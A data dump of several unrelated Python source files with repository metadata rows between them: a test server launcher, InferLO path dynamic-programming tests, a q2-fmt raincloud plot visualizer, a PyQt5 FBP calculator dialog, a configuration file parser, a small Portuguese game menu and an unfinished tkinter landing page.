self.ssl = kwargs.pop('ssl', None)
super(WsgirefSimpleServer, self).__init__(*args, **kwargs)
if self.ssl:
self.scheme = 'https'
def create_command(self):
command = super(WsgirefSimpleServer, self).create_command()
if self.ssl is True:
command += ['--ssl=1']
return command
def check(self, check_url=None):
url = self.check_url if check_url is None else \
self._normalize_check_url(check_url)
if self.ssl:
url = url.replace('http://', 'https://')
super(WsgirefSimpleServer, self).check(url)
@classmethod
def _add_args(cls):
super(WsgirefSimpleServer, cls)._add_args()
cls._argument_parser.add_argument('--ssl',
help='Run with ssl enabled.',
type=bool,
nargs='?',
default=False)
@classmethod
def wrap(cls, app):
host, port = cls.parse_args()
if host:
from wsgiref.simple_server import make_server
server = make_server(host, port, app)
if cls._argument_parser.parse_args().ssl:
# Set HTTPS='1' makes wsgiref set wsgi.url_scheme='https'
# This in turn makes pyramid set request.scheme='https'
server.base_environ['HTTPS'] = '1'
with tempfile.TemporaryDirectory() as td:
# Generate temporary self-signed cert/key pair
# using the library used by Flask for 'adhoc' ssl_context
certpath = '{}/liveandletdie'.format(td)
make_ssl_devcert(certpath)
server.socket = ssl.wrap_socket(
server.socket,
server_side=True,
certfile='{}.crt'.format(certpath),
keyfile='{}.key'.format(certpath),
)
server.serve_forever()
server.server_close()
sys.exit()
class Django(Base):
def create_command(self):
return [
self.executable,
os.path.join(self.path, 'manage.py'),
'runserver',
'{0}:{1}'.format(self.host, self.port),
]
class FastAPIServer(Base):
def __init__(self, *args, **kwargs):
kwargs['executable'] = 'uvicorn'
super().__init__(*args, **kwargs)
def create_command(self):
path_without_extension = self.path.rsplit('.', 1)[0]
return [
self.executable,
'{}:app'.format(path_without_extension),
'--host {}'.format(self.host),
'--port {}'.format(self.port),
'--reload',
]
| 30.342561 | 80 | 0.528338 | 1,917 | 17,538 | 4.696401 | 0.181012 | 0.032878 | 0.021326 | 0.01555 | 0.356659 | 0.30201 | 0.247584 | 0.216706 | 0.202932 | 0.180718 | 0 | 0.009362 | 0.360474 | 17,538 | 577 | 81 | 30.395147 | 0.793331 | 0.173623 | 0 | 0.364162 | 0 | 0.00289 | 0.090163 | 0.013251 | 0 | 0 | 0 | 0.001733 | 0 | 1 | 0.112717 | false | 0.00578 | 0.069364 | 0.008671 | 0.280347 | 0.00578 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87422210ed17bb58ad8b0a9b840dbe0d698bc5e | 1,784 | py | Python | inferlo/pairwise/optimization/path_dp_test.py | InferLO/inferlo | a65efce721d7f99d2f274dd94a1aaf7ca159e944 | [
"Apache-2.0"
] | 1 | 2022-01-27T18:44:07.000Z | 2022-01-27T18:44:07.000Z | inferlo/pairwise/optimization/path_dp_test.py | InferLO/inferlo | a65efce721d7f99d2f274dd94a1aaf7ca159e944 | [
"Apache-2.0"
] | 3 | 2022-01-23T18:02:30.000Z | 2022-01-27T23:10:51.000Z | inferlo/pairwise/optimization/path_dp_test.py | InferLO/inferlo | a65efce721d7f99d2f274dd94a1aaf7ca159e944 | [
"Apache-2.0"
] | 1 | 2021-09-03T06:12:57.000Z | 2021-09-03T06:12:57.000Z | # Copyright (c) 2020, The InferLO authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 - see LICENSE file.
import numpy as np
from inferlo import PairWiseFiniteModel
from inferlo.pairwise.optimization.path_dp import max_lh_path_dp
from inferlo.testing import grid_potts_model, tree_potts_model, \
line_potts_model
def test_grid_4x4x2():
model = grid_potts_model(4, 4, al_size=2, seed=0)
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_grid_3x3x4():
model = grid_potts_model(3, 3, al_size=4, seed=0)
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_grid_2x2x10():
model = grid_potts_model(2, 2, al_size=10, seed=0)
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_line_1000x10():
model = line_potts_model(gr_size=1000, al_size=10, seed=0)
max_lh_gt = model.max_likelihood(algorithm='tree_dp')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_tree_50x2():
model = tree_potts_model(gr_size=50, al_size=2, seed=0)
max_lh_gt = model.max_likelihood(algorithm='tree_dp')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_disconnected():
model = PairWiseFiniteModel(size=4, al_size=5)
model.add_interaction(0, 1, np.random.random(size=(5, 5)))
model.add_interaction(2, 3, np.random.random(size=(5, 5)))
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
| 33.660377 | 68 | 0.742152 | 301 | 1,784 | 4.056478 | 0.212625 | 0.126945 | 0.068796 | 0.09828 | 0.563473 | 0.563473 | 0.530713 | 0.530713 | 0.530713 | 0.530713 | 0 | 0.038918 | 0.150224 | 1,784 | 52 | 69 | 34.307692 | 0.766491 | 0.071749 | 0 | 0.486486 | 0 | 0 | 0.032668 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 1 | 0.162162 | false | 0 | 0.108108 | 0 | 0.27027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87615aea68a574978280da83ef3e7eeef1e199b | 4,516 | py | Python | q2_fmt/_visualizer.py | qiime2/q2-fmt | c2ea6a938bd7688f05a397abd8ad2e7982c53ce7 | [
"BSD-3-Clause"
] | null | null | null | q2_fmt/_visualizer.py | qiime2/q2-fmt | c2ea6a938bd7688f05a397abd8ad2e7982c53ce7 | [
"BSD-3-Clause"
] | null | null | null | q2_fmt/_visualizer.py | qiime2/q2-fmt | c2ea6a938bd7688f05a397abd8ad2e7982c53ce7 | [
"BSD-3-Clause"
] | 1 | 2022-03-07T20:34:23.000Z | 2022-03-07T20:34:23.000Z | # ----------------------------------------------------------------------------
# Copyright (c) 2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import os
import pkg_resources
import jinja2
import json
import pandas as pd
def plot_rainclouds(output_dir: str, data: pd.DataFrame,
stats: pd.DataFrame = None):
table1 = None
if stats is not None:
table1, stats = _make_stats(stats)
J_ENV = jinja2.Environment(
loader=jinja2.PackageLoader('q2_fmt', 'assets')
)
x_label = data['measure'].attrs['title']
y_label = data['group'].attrs['title']
subject_unit = data['subject'].attrs['title']
title = f'{x_label} of {subject_unit} across {y_label}'
figure1 = (
f'Raincloud plots showing the distribution of subjects\''
f' measure of {x_label} across {y_label}. Kernel density estimation'
f' performed using a bandwidth calculated by Scott\'s method. Boxplots'
f' show the min and max of the data (whiskers) as well as the first,'
f' second (median), and third quartiles (box). '
f' Points and connecting lines represent individual subjects'
f' with a consistent jitter added across groups such that slopes'
f' across adjacent groups are visually comparable between subjects.')
index = J_ENV.get_template('index.html')
data = json.loads(data.to_json(orient='records'))
spec_fp = pkg_resources.resource_filename(
'q2_fmt', os.path.join('assets', 'spec.json'))
with open(spec_fp) as fh:
json_obj = json.load(fh)
full_spec = json_replace(json_obj,
data=data, x_label=x_label, y_label=y_label,
title=title)
with open(os.path.join(output_dir, 'index.html'), 'w') as fh:
spec_string = json.dumps(full_spec)
fh.write(index.render(spec=spec_string, stats=stats,
figure1=figure1, table1=table1))
def json_replace(json_obj, **values):
"""
Search for elements of `{"{{REPLACE_PARAM}}": "some_key"}` and replace
with the result of `values["some_key"]`.
"""
if type(json_obj) is list:
return [json_replace(x, **values) for x in json_obj]
elif type(json_obj) is dict:
new = {}
for key, value in json_obj.items():
if type(value) is dict and list(value) == ["{{REPLACE_PARAM}}"]:
param_name = value["{{REPLACE_PARAM}}"]
new[key] = values[param_name]
else:
new[key] = json_replace(value, **values)
return new
else:
return json_obj
def _make_stats(stats):
method = stats['test-statistic'].attrs['title']
group_unit = (stats['A:group'].attrs['title']
+ ' vs ' + stats['B:group'].attrs['title'])
pval_method = stats['p-value'].attrs['title']
qval_method = stats['q-value'].attrs['title']
table1 = (f'{method} tests between groups ({group_unit}), with'
f' {pval_method} p-value calculations and {qval_method}'
f' correction for multiple comparisons (q-value).')
df = pd.DataFrame(index=stats.index)
group_a = _make_group_col('A', stats)
df[group_a.name] = group_a
group_b = _make_group_col('B', stats)
df[group_b.name] = group_b
df['A'] = stats['A:measure']
df['B'] = stats['B:measure']
df = df.merge(stats.iloc[:, 6:], left_index=True, right_index=True)
df.columns = pd.MultiIndex.from_tuples([
('Group A', stats['A:group'].attrs['title']),
('Group B', stats['B:group'].attrs['title']),
('A', stats['A:measure'].attrs['title']),
('B', stats['B:measure'].attrs['title']),
('', 'n'),
('', 'test-statistic'),
('', 'p-value'),
('', 'q-value'),
])
html = df.to_html(index=False)
return table1, html
def _make_group_col(prefix, df):
group_series = df[prefix + ':group']
group_n = df[prefix + ':n']
if (group_series.dtype == float
and group_series.apply(float.is_integer).all()):
group_series = group_series.astype(int)
group_series = group_series.apply(str)
group_n = " (n=" + group_n.apply(str) + ")"
series = group_series + group_n
series.name = f'{"Group "}' + prefix
return series
| 36.419355 | 79 | 0.58791 | 584 | 4,516 | 4.390411 | 0.325342 | 0.046802 | 0.029251 | 0.014041 | 0.032761 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005834 | 0.240921 | 4,516 | 123 | 80 | 36.715447 | 0.742124 | 0.097874 | 0 | 0.021505 | 0 | 0 | 0.246789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043011 | false | 0 | 0.053763 | 0 | 0.150538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8774bec857cbb97e4eda662898c5c3beaf5c549 | 14,862 | py | Python | fbp_calculator/dialogfbp.py | deselmo/FBP_Calculator | 90bb07f123fea224fdca24aabeceabd391b7d51e | [
"MIT"
] | null | null | null | fbp_calculator/dialogfbp.py | deselmo/FBP_Calculator | 90bb07f123fea224fdca24aabeceabd391b7d51e | [
"MIT"
] | null | null | null | fbp_calculator/dialogfbp.py | deselmo/FBP_Calculator | 90bb07f123fea224fdca24aabeceabd391b7d51e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import xlsxwriter
from PyQt5 import QtCore, QtGui, QtWidgets
from fbp_calculator.ui_dialogfbp import Ui_DialogFBP
from fbp_calculator.calculatorfbp import QThreadCalculatorFBP
from fbp_calculator.reaction_adapter import reaction_invadapter
class DialogFBP(QtWidgets.QDialog, Ui_DialogFBP):
def __init__(self, parent,
symbols, steps, reaction_set, context_given_set, context_not_given_set):
super(DialogFBP, self).__init__(parent)
self.setupUi(self)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.formulaType_defaultIndex = 1
self.comboBoxFormulaType.setCurrentIndex(self.formulaType_defaultIndex)
self.textBrowserFormula.setVisible(self.formulaType_defaultIndex == 0)
self.listFormula.setVisible(self.formulaType_defaultIndex == 1)
self.tableWidgetFormula.setVisible(self.formulaType_defaultIndex == 2)
self.symbols = symbols
self.steps = steps
self.reaction_set = reaction_set
self.context_given_set = context_given_set
self.context_not_given_set = context_not_given_set
self.lineEditSymbols.setText(reaction_invadapter(self.symbols))
self.lineEditSteps.setText(str(self.steps))
self.labelLoadingImage.setMovie(QtGui.QMovie(":/loader.gif"))
self.labelLoadingImage.movie().start()
self.toolButtonSave.setVisible(False)
self.toolButtonSave.clicked.connect(self.toolButtonSave_clicked)
self.comboBoxFormulaType.currentIndexChanged.connect(self.comboBoxFormulaType_currentIndexChanged)
self.listFormula.verticalScrollBar().valueChanged.connect(self.listFormula_scrollBar_valueChanged)
self.tableWidgetFormula.horizontalScrollBar().valueChanged.connect(self.tableWidgetFormula_horizontalScrollBar_valueChanged)
self.tableWidgetFormula.verticalScrollBar().valueChanged.connect(self.tableWidgetFormula_verticalScrollBar_valueChanged)
self.QThreadCalculatorFBP = QThreadCalculatorFBP(self)
self.QThreadCalculatorFBP.finished.connect(self.QThread_finishedCalculatorFBP)
self.QThreadCalculatorFBP.start()
def toolButtonSave_clicked(self):
formulaType_index = self.comboBoxFormulaType.currentIndex()
if formulaType_index == 0:
file_name, _ = QtWidgets.QFileDialog.getSaveFileName(self,
'Save result as',
'untitled.txt',
'TXT files (*.txt)')
if not file_name:
return
try:
with open(file_name, 'w') as file:
file.write(self.save_text)
except Exception as e:
error_message = str(e)
if 'Errno' in error_message:
error_message = error_message.split('] ')[1]
QtWidgets.QMessageBox.critical(self,
'Error when saving the file',
'{}'.format(error_message),
QtWidgets.QMessageBox.Close,
QtWidgets.QMessageBox.Close)
elif formulaType_index == 1:
file_name, _ = QtWidgets.QFileDialog.getSaveFileName(self,
'Save result as',
'untitled.txt',
'TXT files (*.txt)')
if not file_name:
return
try:
with open(file_name, 'w') as file:
file.write(self.save_list)
except Exception as e:
error_message = str(e)
if 'Errno' in error_message:
error_message = error_message.split('] ')[1]
QtWidgets.QMessageBox.critical(self,
'Error when saving the file',
'{}'.format(error_message),
QtWidgets.QMessageBox.Close,
QtWidgets.QMessageBox.Close)
elif formulaType_index == 2:
file_name, _ = QtWidgets.QFileDialog.getSaveFileName(self,
'Save result as',
'untitled.xlsx',
'XLSX files (*.xlsx)')
if not file_name:
return
workbook = xlsxwriter.Workbook(file_name)
worksheet = workbook.add_worksheet()
if isinstance(self.formula, bool):
worksheet.write(0, 0, str(self.formula))
else:
for i in range(0, self.steps):
worksheet.write(0, i, str(i+1))
for i in range(0, len(self.formula_table)):
row = self.formula_table[i]
for column in row:
text = row[column]
worksheet.write(i+1, column, text)
try:
workbook.close()
except Exception as e:
error_message = str(e)
if 'Errno' in error_message:
error_message = error_message.split('] ')[1]
QtWidgets.QMessageBox.critical(self,
'Error when saving the file',
'{}'.format(error_message),
QtWidgets.QMessageBox.Close,
QtWidgets.QMessageBox.Close)
def resizeEvent(self, event):
self.listFormula_fillSpace()
self.tableWidgetFormula_fillVerticalSpace()
self.tableWidgetFormula_fillHorizontalSpace()
def closeEvent(self, event):
self.QThreadCalculatorFBP.stop()
self.QThreadCalculatorFBP.wait()
event.accept()
def QThread_finishedCalculatorFBP(self):
if self.QThreadCalculatorFBP.stopped:
return
self.labelLoadingImage.setVisible(False)
self.labelLoadingImage.movie().stop()
self.labelComputing.setVisible(False)
if not self.QThreadCalculatorFBP.result['completed']:
self.labelComputing.setStyleSheet("QLabel { color : red; font-weight:600; }")
self.labelComputing.setText('Error during the fbp calculation')
self.labelComputing.setVisible(True)
return
self.formula = self.QThreadCalculatorFBP.result['formula']
self.formula_table = self.QThreadCalculatorFBP.result['formula_table']
self.toolButtonSave.setVisible(True)
self.comboBoxFormulaType.setEnabled(True)
self.comboBoxFormulaType_currentIndexChanged(self.formulaType_defaultIndex)
self.raise_()
def comboBoxFormulaType_currentIndexChanged(self, index):
if index == 0:
self.textBrowserFormula_show()
elif index == 1:
self.listFormula_show()
elif index == 2:
self.tableWidgetFormula_show()
def textBrowserFormula_show(self):
self.listFormula.setVisible(False)
self.tableWidgetFormula.setVisible(False)
self.textBrowserFormula.setVisible(True)
if not self.textBrowserFormula.isEnabled():
self.textBrowserFormula.setEnabled(True)
self.textBrowserFormula_initialize()
def textBrowserFormula_initialize(self):
if isinstance(self.formula, bool):
text = str(self.formula)
self.textBrowserFormula.setText(text)
self.save_text = text
return
text_subbed = ''
prebrackets = len(self.formula) > 1
for i in range(0, len(self.formula)):
if i > 0: text_subbed += ' ∨ '
backets = prebrackets and len(self.formula[i]) > 1
if backets: text_subbed += '('
for j in range(0, len(self.formula[i])):
if j > 0: text_subbed += ' ∧ '
n, s = self.formula[i][j]
text_subbed += '{}<sub>{}</sub>'.format(s, str(n))
if backets: text_subbed += ')'
self.textBrowserFormula.setText(text_subbed)
save_text = text_subbed
save_text = re.sub('<sub>', '_', save_text)
save_text = re.sub('</sub>', '', save_text)
self.save_text = save_text
def listFormula_show(self):
self.textBrowserFormula.setVisible(False)
self.tableWidgetFormula.setVisible(False)
self.listFormula.setVisible(True)
if not self.listFormula.isEnabled():
self.listFormula.setEnabled(True)
self.listFormula_initialize()
else:
self.listFormula_fillSpace()
def listFormula_initialize(self):
if isinstance(self.formula, bool):
text = str(self.formula)
self.listFormula.addItem(QtWidgets.QListWidgetItem(text))
self.save_list = text
return
text = ''
for f in self.formula:
for i in range(0, len(f)):
n, s = f[i]
text += '{}_{} '.format(s, str(n))
text = text[:-1]
text += '\r\n'
self.save_list = text
self.listFormula_fillSpace()
def listFormula_fillSpace(self):
if (not self.listFormula.isEnabled() or not self.listFormula.isVisible()
or isinstance(self.formula, bool)):
return
for _ in range(self.listFormula.count(), len(self.formula)):
if self.listFormula.verticalScrollBar().maximum() != 0:
break
self.listFormula_addRow()
def listFormula_scrollBar_valueChanged(self, value):
if (not self.listFormula.isEnabled() or not self.listFormula.isVisible()
or isinstance(self.formula, bool)):
return
listFormula_len = self.listFormula.count()
if (listFormula_len < len(self.formula) and
value == self.listFormula.verticalScrollBar().maximum()):
self.listFormula_addRow()
def listFormula_addRow(self):
f = self.formula[self.listFormula.count()]
text = ''
for i in range(0, len(f)):
n, s = f[i]
text += '{}<sub>{}</sub> '.format(s, str(n))
text = text[:-1]
label = QtWidgets.QLabel(text)
label.setContentsMargins(4,4,4,4)
item = QtWidgets.QListWidgetItem()
item.setSizeHint(QtCore.QSize(0, label.sizeHint().height()+4))
self.listFormula.addItem(item)
self.listFormula.setItemWidget(item, label)
def tableWidgetFormula_show(self):
self.textBrowserFormula.setVisible(False)
self.listFormula.setVisible(False)
self.tableWidgetFormula.setVisible(True)
if not self.tableWidgetFormula.isEnabled():
self.tableWidgetFormula.setEnabled(True)
self.tableWidgetFormula_initialize()
else:
self.tableWidgetFormula_fillVerticalSpace()
self.tableWidgetFormula_fillHorizontalSpace()
def tableWidgetFormula_initialize(self):
if isinstance(self.formula, bool):
self.tableWidgetFormula.horizontalHeader().setVisible(False)
self.tableWidgetFormula.setRowCount(1)
self.tableWidgetFormula.setColumnCount(1)
self.tableWidgetFormula_addCell(0, 0, str(self.formula))
self.tableWidgetFormula_resizeToContent()
return
self.tableWidgetFormula_fillHorizontalSpace()
self.tableWidgetFormula_fillVerticalSpace()
def tableWidgetFormula_fillVerticalSpace(self):
if (not self.tableWidgetFormula.isEnabled() or not self.tableWidgetFormula.isVisible()
or isinstance(self.formula, bool)):
return
for _ in range(self.tableWidgetFormula.rowCount(), len(self.formula_table)):
if self.tableWidgetFormula.verticalScrollBar().maximum() != 0:
break
self.tableWidgetFormula_addRow()
def tableWidgetFormula_fillHorizontalSpace(self):
if (not self.tableWidgetFormula.isEnabled() or not self.tableWidgetFormula.isVisible()
or isinstance(self.formula, bool)):
return
for _ in range(self.tableWidgetFormula.columnCount(), self.steps):
if self.tableWidgetFormula.horizontalScrollBar().maximum() != 0:
break
self.tableWidgetFormula_addColumn()
def tableWidgetFormula_verticalScrollBar_valueChanged(self, value):
if (not self.tableWidgetFormula.isEnabled() or not self.tableWidgetFormula.isVisible()
or isinstance(self.formula, bool)):
return
if (self.tableWidgetFormula.rowCount() < len(self.formula_table) and
value == self.tableWidgetFormula.verticalScrollBar().maximum()):
self.tableWidgetFormula_addRow()
def tableWidgetFormula_horizontalScrollBar_valueChanged(self, value):
if (not self.tableWidgetFormula.isEnabled()) or isinstance(self.formula, bool):
return
if (self.tableWidgetFormula.columnCount() < self.steps and
value == self.tableWidgetFormula.horizontalScrollBar().maximum()):
self.tableWidgetFormula_addColumn()
def tableWidgetFormula_addRow(self):
column = self.tableWidgetFormula.columnCount()
row = self.tableWidgetFormula.rowCount()
self.tableWidgetFormula.setRowCount(row+1)
f = self.formula_table[row]
for i in range(0, column):
if not i in f: continue
s = f[i]
self.tableWidgetFormula_addCell(row, i, s)
self.tableWidgetFormula_resizeToContent()
def tableWidgetFormula_addColumn(self):
column = self.tableWidgetFormula.columnCount()
row = self.tableWidgetFormula.rowCount()
self.tableWidgetFormula.setColumnCount(column+1)
self.tableWidgetFormula.setHorizontalHeaderItem(column, QtWidgets.QTableWidgetItem(str(column+1)))
for i in range(0, row):
f = self.formula_table[i]
if not column in f: continue
s = f[column]
self.tableWidgetFormula_addCell(i, column, s)
self.tableWidgetFormula_resizeToContent()
def tableWidgetFormula_addCell(self, row, column, text):
cellWidget = self.tableWidgetFormula.cellWidget(row, column)
if cellWidget == None:
label = QtWidgets.QLabel(text)
label.setContentsMargins(8,2,8,2)
label.setAlignment(QtCore.Qt.AlignLeft)
self.tableWidgetFormula.setCellWidget(row, column, label)
else:
raise Exception('Add a cell more than one time')
def tableWidgetFormula_resizeToContent(self):
self.tableWidgetFormula.horizontalHeader().setResizeContentsPrecision(self.tableWidgetFormula.rowCount())
self.tableWidgetFormula.resizeColumnsToContents()
self.tableWidgetFormula.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
| 39.007874 | 132 | 0.621922 | 1,391 | 14,862 | 6.524083 | 0.149533 | 0.14303 | 0.023141 | 0.027548 | 0.436143 | 0.345565 | 0.307769 | 0.24022 | 0.24022 | 0.216749 | 0 | 0.00536 | 0.284484 | 14,862 | 380 | 133 | 39.110526 | 0.847847 | 0.001413 | 0 | 0.403974 | 0 | 0 | 0.029786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076159 | false | 0 | 0.019868 | 0 | 0.145695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8788321cfe29c5b65aa0dcb3161af6d1defc792 | 3,721 | py | Python | spts/config.py | FilipeMaia/spts | de4eb2920b675537da611c7301d4d5a9565a1ab1 | [
"BSD-2-Clause"
] | null | null | null | spts/config.py | FilipeMaia/spts | de4eb2920b675537da611c7301d4d5a9565a1ab1 | [
"BSD-2-Clause"
] | 5 | 2021-03-26T11:37:40.000Z | 2021-03-31T09:20:40.000Z | spts/config.py | FilipeMaia/spts | de4eb2920b675537da611c7301d4d5a9565a1ab1 | [
"BSD-2-Clause"
] | 1 | 2021-03-24T11:07:41.000Z | 2021-03-24T11:07:41.000Z | import os, numpy, configparser
import logging
logger = logging.getLogger(__name__)
import spts.log
from spts.log import log_and_raise_error,log_warning,log_info,log_debug
def read_configfile(configfile):
"""
Read configuration file to dictionary
"""
config = configparser.ConfigParser()
with open(configfile,"r") as f:
config.readfp(f)
confDict = {}
for section in config.sections():
confDict[section] = {}
c = config.items(section)
for (key,value) in c:
confDict[section][key] = _estimate_class(value)
return confDict
def write_configfile(configdict, filename):
"""
Write configuration file from a dictionary
"""
ls = ["# Configuration file\n# Automatically written by Configuration instance\n\n"]
for section_name,section in configdict.items():
if isinstance(section,dict):
ls.append("[%s]\n" % section_name)
for variable_name,variable in section.items():
if (hasattr(variable, '__len__') and (not isinstance(variable, str))) or isinstance(variable, list):
ls.append("%s=%s\n" % (variable_name,_list_to_str(variable)))
else:
ls.append("%s=%s\n" % (variable_name,str(variable)))
ls.append("\n")
with open(filename, "w") as f:
f.writelines(ls)
def read_configdict(configdict):
C = {}
for k,v in configdict.items():
if isinstance(v, dict):
v_new = read_configdict(v)
else:
v_new = _estimate_class(v)
C[k] = v_new
return C
def _estimate_class(var):
v = _estimate_type(var)
if isinstance(v,str):
v = v.replace(" ","")
if v.startswith("[") and v.endswith("]"):
v = _str_to_list(v)
for i in range(len(v)):
v[i] = os.path.expandvars(v[i]) if isinstance(v[i], str) else v[i]
elif v.startswith("{") and v.endswith("}"):
v = v[1:-1].split(",")
v = [w for w in v if len(w) > 0]
d = {}
for w in v:
key,value = w.split(":")
value = _estimate_type(value)
if value.startswith("$"):
value = os.path.expandvars(value)
d[key] = value
v = d
else:
if v.startswith("$"):
v = os.path.expandvars(v)
return v
def _estimate_type(var):
if not isinstance(var, str):
return var
#first test bools
if var.lower() == 'true':
return True
elif var.lower() == 'false':
return False
elif var.lower() == 'none':
return None
else:
#int
try:
return int(var)
except ValueError:
pass
#float
try:
return float(var)
except ValueError:
pass
#string
try:
return str(var)
except ValueError:
raise NameError('Something messed up autocasting var %s (%s)' % (var, type(var)))
def _str_to_list(s):
if s.startswith("[") and s.endswith("]"):
if s[1:-1].startswith("[") and s[1:-1].endswith("]"):
return _str_to_list(s[1:-1])
else:
l = s[1:-1].split(",")
l = [_estimate_type(w) for w in l if len(w) > 0]
return l
else:
return s
def _list_to_str(L):
if (hasattr(L, '__len__') and (not isinstance(L, str))) or isinstance(L, list):
s = ""
for l in L:
s += _list_to_str(l)
s += ","
s = "[" + s[:-1] + "]"
return s
else:
return str(L)
| 30.252033 | 116 | 0.520828 | 459 | 3,721 | 4.087146 | 0.228758 | 0.00533 | 0.006397 | 0.020256 | 0.081023 | 0.050107 | 0.02452 | 0 | 0 | 0 | 0 | 0.005343 | 0.346144 | 3,721 | 122 | 117 | 30.5 | 0.765721 | 0.029831 | 0 | 0.165049 | 0 | 0 | 0.052013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067961 | false | 0.019417 | 0.038835 | 0 | 0.252427 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8789fe72bc8cc557e2a565c965147972faca923 | 556 | py | Python | Jogos/jogos.py | jbauermanncode/Alura | be3fe9b717f3f7fe54262f3129076e7736be61a6 | [
"MIT"
] | null | null | null | Jogos/jogos.py | jbauermanncode/Alura | be3fe9b717f3f7fe54262f3129076e7736be61a6 | [
"MIT"
] | null | null | null | Jogos/jogos.py | jbauermanncode/Alura | be3fe9b717f3f7fe54262f3129076e7736be61a6 | [
"MIT"
] | null | null | null | #Importar forca e adivinhacao
import forca
import adivinhacao
def escolhe_jogo():
print('*'*25 )
print('***Escolha o seu jogo!***')
print('*'*25)
print('(1) Forca (2) Adivinhação')
jogo = int(input('Digite 1 ou 2 para escolher um jogo: '))
if(jogo == 1):
print('Jogo da Forca')
#função jogar de adivinhação
forca.jogar()
elif(jogo == 2):
print('Jogo de Adivinhação')
adivinhacao.jogar()
# Para saber se o arquivo é o principal ou não
if(__name__=='__main__'):
escolhe_jogo()
| 19.172414 | 62 | 0.600719 | 73 | 556 | 4.438356 | 0.506849 | 0.067901 | 0.067901 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024272 | 0.258993 | 556 | 28 | 63 | 19.857143 | 0.762136 | 0.179856 | 0 | 0.125 | 0 | 0 | 0.287305 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.1875 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a879073ae93c60365cc903909e15d337b82c7959 | 2,153 | py | Python | STIMB Landing Page.py | ksu-hmi/STIMythBuster | 4cf5c7456d043a9a251f3d3f3c66b4e3a17241fb | [
"MIT"
] | 1 | 2021-11-05T01:57:43.000Z | 2021-11-05T01:57:43.000Z | STIMB Landing Page.py | ksu-hmi/STIMythBuster | 4cf5c7456d043a9a251f3d3f3c66b4e3a17241fb | [
"MIT"
] | null | null | null | STIMB Landing Page.py | ksu-hmi/STIMythBuster | 4cf5c7456d043a9a251f3d3f3c66b4e3a17241fb | [
"MIT"
] | 2 | 2021-11-18T01:17:33.000Z | 2021-11-18T01:22:09.000Z | #import libraries
import tkinter as tk
from tkinter import *
from PIL import ImageTk, Image
#beginning of code
root = tk.Tk()
root.title("STIMythBusters Interactive Application")
canvas = tk.Canvas(root, bg="purple", width=600, height=400)
canvas.grid(columnspan=4, rowspan=4)
canvas2 = tk.Canvas2(root, bg="purple", width=600, height=400)
canvas2.grid(columnspan=4, rowspan=4)
frame = tk.Canvas2(root, bg="blue", width=600, height=400)
frame.grid(x=20, y=20)
#Open logo
load = Image.open("logo.png")
render = ImageTk.PhotoImage(load)
#Then associate it with the label:
img = tk.Label(canvas, image=render)
img.image = render
img.place(x=20, y=20)
#instrutions - Landing Page
instructions = tk.Label(root, text="Welcome to STIMythBusters", font="Raleway", bg="brown", fg="white")
instructions.grid(columnspan=4, column=0, row=0)
def open_file():
browser_text.set("loading....")
canvas2 = tk.Canvas(root, bg="purple", width=600, height=400)
